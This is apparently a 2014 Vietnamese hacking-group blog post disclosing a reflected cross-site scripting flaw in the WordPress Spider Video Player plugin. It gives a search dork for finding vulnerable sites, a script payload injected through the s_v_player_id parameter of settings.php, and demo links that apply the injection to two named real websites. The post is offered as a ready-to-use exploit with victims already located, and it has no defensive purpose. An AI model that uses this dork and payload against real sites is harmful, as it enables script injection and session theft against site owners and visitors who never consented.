Forum in Đế Vương team

Thứ Bảy, 2 tháng 8, 2014

Wordpress Spider Video Player plugin Cross Site Scripting

Dork:

inurl:wp-content/plugins/player/settings.php

Script:
site.com/wordpress/wp-content/plugins/player/settings.php?s_v_player_id="/><script>alert(1);</script>
Demo:
http://www.cintro.com.br/wordpress/wp-content/plugins/player/settings.php?playlist=1&theme=1&s_v_player_id=%3Ch1%3EJoker%20Dark%20Knight%3C/h1%3E

http://fmst.hephzibah.com.ng/wp-content/plugins/player/settings.php?playlist=1&theme=2&s_v_player_id=%3Ch1%3EJoker%20Dark%20Knight%3C/h1%3E

Người đăng: Admin vào lúc 19:45

Gửi email bài đăng này BlogThis!Chia sẻ lên X Chia sẻ lên Facebook Chia sẻ lên Pinterest

Nhãn: Exploit - Vulnerability, XSS

Không có nhận xét nào:

Đăng nhận xét

Bài đăng Mới hơn Bài đăng Cũ hơn Trang chủ

Đăng ký: Đăng Nhận xét (Atom)

Giới thiệu về tôi

Admin

Xem hồ sơ hoàn chỉnh của tôi

Lưu trữ Blog

► 2015 (115)
- ► tháng 6 (11)
- ► tháng 5 (21)
- ► tháng 4 (16)
- ► tháng 3 (8)
- ► tháng 2 (32)
- ► tháng 1 (27)

▼ 2014 (185)
- ► tháng 12 (19)
- ► tháng 11 (32)
- ► tháng 10 (15)
- ► tháng 9 (20)
- ▼ tháng 8 (95)
- ► tháng 7 (4)

Chủ đề Đơn giản. Được tạo bởi Blogger.